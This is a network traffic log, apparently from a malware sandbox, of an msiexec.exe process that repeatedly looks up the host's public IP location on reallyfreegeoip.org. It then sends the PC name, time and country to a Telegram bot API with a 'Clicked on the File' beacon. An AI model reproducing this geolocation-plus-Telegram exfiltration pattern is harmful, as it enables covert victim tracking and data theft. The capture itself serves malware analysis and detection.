Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 50008 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:11 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:11 UTC | 892 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:11 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31687
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2X7x2PkQQYmUtf1VdX%2BH4VTrf1bFIUQ77ipWDK1YGbx3DDArztNlrhCgdqtZcYHLbmZ9UDzP8r2u2q0V3p4QZQ42ZNhnvCrhDoxSBCXyPCkQcUXDS9oMJIl8UaQybCp2OL%2FMWc9t"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14b4fd1ce9a9-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1381&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2073013&cwnd=251&unsent_bytes=0&cid=23df2b4c614c8d6a&ts=148&x=0"
2024-10-22 14:12:11 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:11 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 50009 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:12 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:12 UTC | 896 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:12 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31688
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXBjWdAZx%2FhYJjewCQCKrbp7RbulFD%2B0A2lFXuC7xxAv9Nykt7Ttrsn5aQUVsk4qkyAYj2i6aT%2FEMS1NioKFCMYk66nlx9dPrDQOO3ACd7l9ag4429HTPQqDormOupXVBVTow%2Bvk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14b779796be3-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2450084&cwnd=237&unsent_bytes=0&cid=b53f2f5ed5327d3e&ts=152&x=0"
2024-10-22 14:12:12 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:12 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 50012 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:13 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:13 UTC | 906 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:13 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31689
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0n4Yf8EcWwlp9eioa%2BV%2Fhq639qi25d2x7d8%2FayHDxaI31c6u9Hlb2%2FuTarBb2mtBCUIaw%2Fbnkm4YXRiuOmwb90GmL9WSkzDAu1b7Frh%2F%2BU%2FDknsfXxWBmng9s0Rwx%2BrXfIMxAW2o"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14bf99fa2821-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2142011&cwnd=249&unsent_bytes=0&cid=a54a5d3e52918753&ts=149&x=0"
2024-10-22 14:12:13 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:13 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50013 | 188.114.97.3 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:13 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2024-10-22 14:12:13 UTC | 893 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:13 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31689
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAXdUc1cUmqMudF%2FwM9BHZnRkX%2Bl1jYb0T02W1d5o4FJ6m3BA0%2F8T3nIljMFCnkIuzJuDzWpZoFrPFgzVJ5zTEDsSv5BufxhXAFvD5aR6CIHfMBDjnGcjkEdq2jABTTawTtEqCHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14c20fa16b55-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1740384&cwnd=32&unsent_bytes=0&cid=4250d849815f7e88&ts=161&x=0"
2024-10-22 14:12:13 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50016 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:14 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2024-10-22 14:12:15 UTC | 892 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:15 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31691
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyVk8iIQK%2FrmoOsIv7SZhmI60dfLcneURxNl96jJ2QlzdwJKw9pUR1un7XwJ%2BdvtBs4UHJal9TWZLBTlEZwIZNiGyteZdoCHPijS8sd089wQWqxrqD4q5rwfrTWfSPpui6cYdBLS"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14c9cabee9a4-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=d0f90790ee196b7e&ts=183&x=0"
2024-10-22 14:12:15 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50017 | 188.114.97.3 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:15 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2024-10-22 14:12:15 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:15 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31691
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FB6DQ1jGAR67Tj6tO8K7k9SPs1HIbBec5H1d%2FgrlMsaAqQ%2Bw0mcFewK7baBBzROq7PSReY3Nj3H3aH%2F%2FfQtafuV82UDLJVqLMQdBvZH4qtOSptg9rLSqZp7joI%2FC2%2BohGUpzHPw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14ce0b5c0bc4-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1778869&cwnd=245&unsent_bytes=0&cid=c75cf867ac92b266&ts=155&x=0"
2024-10-22 14:12:15 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50020 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:16 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2024-10-22 14:12:16 UTC | 889 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:16 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31692
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D08n6FTGUGoX1fwpKPZZ3ZEbwoVFmUSowimSYEdaNBIYXpNstxcA7cNu5UW79XvFRWxe9Ap0cjbEt04RsFlamwbiSEub6mpUvzMZXBCu7SZY8V47T8JLTGtx4zog1rmPjF56R%2F77"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14d469dce98f-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2360228&cwnd=40&unsent_bytes=0&cid=955fe602a91f23b4&ts=183&x=0"
2024-10-22 14:12:16 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50021 | 188.114.97.3 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:17 UTC | 63 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
2024-10-22 14:12:17 UTC | 896 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:17 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31693
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2F8iJxIrAqEVGfXhIQWxvN4AN7bi56d36Foimlfpv55%2BBZN85tonoV2hitoNHsUftnKFcpMTcZK%2FomESicRPUyLkHoKYHjOrCLhmct%2FPU4Jn3SWnX4qXIADMKBxGLTDJTFDtmHFP"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14d84a26e9b5-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1691588&cwnd=251&unsent_bytes=0&cid=9eae4b8647486528&ts=166&x=0"
2024-10-22 14:12:17 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50024 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:18 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2024-10-22 14:12:18 UTC | 894 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:18 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31694
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrsUwXuwzFmrcGqSTiH3DJl5kQpdu9%2BwmRHUOQpANt0kduIUFrVeU8QPitspJNZNDMNqxOkupjEza1YrXttAh14QWNBNK0jOIE5b0jVNxtFBePA%2FYk%2FZJ1OCxhWAw2wxeWWInCEj"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14de7caf3476-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2371826&cwnd=251&unsent_bytes=0&cid=42c10a61516b9f49&ts=152&x=0"
2024-10-22 14:12:18 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50023 | 149.154.167.220 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:18 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-22 14:12:18 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 22 Oct 2024 14:12:18 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-22 14:12:18 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50025 | 149.154.167.220 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:19 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-22 14:12:19 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 22 Oct 2024 14:12:19 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-22 14:12:19 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
